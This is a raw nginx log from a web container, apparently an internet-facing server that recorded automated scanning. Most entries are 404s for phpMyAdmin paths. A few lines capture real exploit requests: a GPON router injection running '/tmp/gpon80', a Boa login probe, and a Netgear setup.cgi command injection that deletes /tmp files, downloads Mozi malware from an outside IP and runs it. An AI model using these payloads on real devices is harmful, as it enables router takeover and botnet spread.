frontend_1  | 2021/05/03 22:07:59 [error] 18#18: *90 open() "/frontend/app/phpMyAdmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:07:59 +0000] "GET /PMA2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:07:59 [error] 18#18: *91 open() "/frontend/app/PMA2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:00 +0000] "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:00 [error] 18#18: *92 open() "/frontend/app/db/phpmyadmin3/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:00 +0000] "GET /pma2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:00 [error] 18#18: *93 open() "/frontend/app/pma2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:01 +0000] "GET /mysql/web/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:01 [error] 18#18: *94 open() "/frontend/app/mysql/web/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/web/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:08:01 [error] 18#18: *95 open() "/frontend/app/phpmyadmin2015/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2015/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:01 +0000] "GET /phpmyadmin2015/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:02 +0000] "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:02 [error] 18#18: *96 open() "/frontend/app/admin/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:08:02 [error] 18#18: *97 open() "/frontend/app/PMA2015/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2015/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:02 +0000] "GET /PMA2015/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:03 [error] 18#18: *98 open() "/frontend/app/sql/sqladmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/sqladmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:03 +0000] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:03 [error] 18#18: *99 open() "/frontend/app/phpmyadmin3/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin3/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:03 +0000] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:04 [error] 18#18: *100 open() "/frontend/app/phpmyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:04 +0000] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:04 [error] 18#18: *101 open() "/frontend/app/phpMyAdmin3/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin3/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:04 +0000] "GET /phpMyAdmin3/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:05 [error] 18#18: *102 open() "/frontend/app/admin/phpmyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:05 +0000] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:05 +0000] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:05 [error] 18#18: *103 open() "/frontend/app/phpmyadmin2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:08:06 [error] 18#18: *104 open() "/frontend/app/mysql/db/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/db/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:06 +0000] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:06 [error] 18#18: *105 open() "/frontend/app/php-my-admin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /php-my-admin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:06 +0000] "GET /php-my-admin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:07 +0000] "GET /PMA/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:07 [error] 18#18: *106 open() "/frontend/app/PMA/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:07 +0000] "GET /database/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:07 [error] 18#18: *107 open() "/frontend/app/database/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /database/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:08 +0000] "GET /pma2014/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:08 [error] 18#18: *108 open() "/frontend/app/pma2014/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2014/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:08 +0000] "GET /db/websql/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:08 [error] 18#18: *109 open() "/frontend/app/db/websql/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/websql/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:09 +0000] "GET /pma2011/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:09 [error] 18#18: *110 open() "/frontend/app/pma2011/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2011/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:09 +0000] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:09 [error] 18#18: *111 open() "/frontend/app/sql/myadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/myadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:08:10 [error] 18#18: *112 open() "/frontend/app/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:10 +0000] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:10 [error] 18#18: *113 open() "/frontend/app/program/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /program/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:10 +0000] "GET /program/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:11 [error] 18#18: *114 open() "/frontend/app/phpmyadmin2018/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2018/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:11 +0000] "GET /phpmyadmin2018/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:11 [error] 18#18: *115 open() "/frontend/app/db/phpMyAdmin3/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:11 +0000] "GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:12 [error] 18#18: *116 open() "/frontend/app/phpmyadmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:12 +0000] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:12 +0000] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:12 [error] 18#18: *117 open() "/frontend/app/phpmyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:13 +0000] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:13 [error] 18#18: *118 open() "/frontend/app/administrator/PMA/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/PMA/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:13 +0000] "GET /pma2015/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:13 [error] 18#18: *119 open() "/frontend/app/pma2015/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2015/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:08:14 [error] 18#18: *120 open() "/frontend/app/db/webdb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/webdb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:14 +0000] "GET /db/webdb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:14 +0000] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:14 [error] 18#18: *121 open() "/frontend/app/mysql/pma/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/pma/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:08:15 [error] 18#18: *122 open() "/frontend/app/phpmyadmin5/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin5/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:15 +0000] "GET /phpmyadmin5/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:15 +0000] "GET /pma2011/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:15 [error] 18#18: *123 open() "/frontend/app/pma2011/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2011/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:08:16 [error] 18#18: *124 open() "/frontend/app/administrator/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:16 +0000] "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:16 [error] 18#18: *125 open() "/frontend/app/phpMyAdmin5/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:16 +0000] "GET /phpMyAdmin5/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:17 +0000] "GET /administrator/db/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:17 [error] 18#18: *126 open() "/frontend/app/administrator/db/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/db/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/03 22:08:17 [error] 18#18: *127 open() "/frontend/app/pma2013/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2013/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:17 +0000] "GET /pma2013/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:18 [error] 18#18: *128 open() "/frontend/app/phpmyadmin1/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin1/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:18 +0000] "GET /phpmyadmin1/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:18 [error] 18#18: *129 open() "/frontend/app/MyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /MyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:18 +0000] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:08:19 [error] 18#18: *130 open() "/frontend/app/PMA2020/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2020/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:08:19 +0000] "GET /PMA2020/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/03 22:10:13 [error] 18#18: *131 open() "/frontend/app/GponForm/diag_Form" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "POST /GponForm/diag_Form?images/ HTTP/1.1", host: "127.0.0.1:80"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:10:13 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 146 "-" "Hello, World" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:10:13 +0000] ";sh+/tmp/gpon80&ipv=0" 400 150 "-" "-" "-"
frontend_1  | 172.18.0.1 - - [03/May/2021:22:24:50 +0000] "GET / HTTP/1.1" 200 4970 "-" "curl/7.58.0" "-"
frontend_1  | 172.18.0.1 - - [04/May/2021:00:01:59 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [04/May/2021:00:18:40 +0000] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 146 "-" "-" "-"
frontend_1  | 2021/05/04 00:18:40 [error] 18#18: *134 open() "/frontend/app/boaform/admin/formLogin" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0"
frontend_1  | 172.18.0.1 - - [04/May/2021:00:48:13 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [04/May/2021:02:52:37 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [04/May/2021:02:52:37 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [04/May/2021:02:52:37 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [04/May/2021:02:52:40 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-"
frontend_1  | 2021/05/04 03:06:59 [error] 18#18: *140 open() "/frontend/app/setup.cgi" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://211.218.221.35:46372/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0"
frontend_1  | 172.18.0.1 - - [04/May/2021:03:06:59 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://211.218.221.35:46372/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 146 "-" "-" "-"
frontend_1  | 172.18.0.1 - - [04/May/2021:03:29:00 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-"
frontend_1  | 172.18.0.1 - - [04/May/2021:03:35:59 +0000] "GET / HTTP/1.0" 200 4970 "-" "-" "-"
frontend_1  | 172.18.0.1 - - [04/May/2021:03:39:44 +0000] "GET / HTTP/1.1" 200 4970 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:48:25 +0000] "GET /bundle.js HTTP/1.1" 304 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:48:25 +0000] "GET /conf/conf.js HTTP/1.1" 200 398 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:48:26 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:48:26 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:48:26 [error] 20#20: *2 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:48:26 [error] 20#20: *1 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:48:29 [error] 20#20: *6 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:48:29 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:48:29 [error] 20#20: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:48:29 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:48:32 +0000] "GET /conf/conf.js HTTP/1.1" 304 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:48:33 [error] 20#20: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
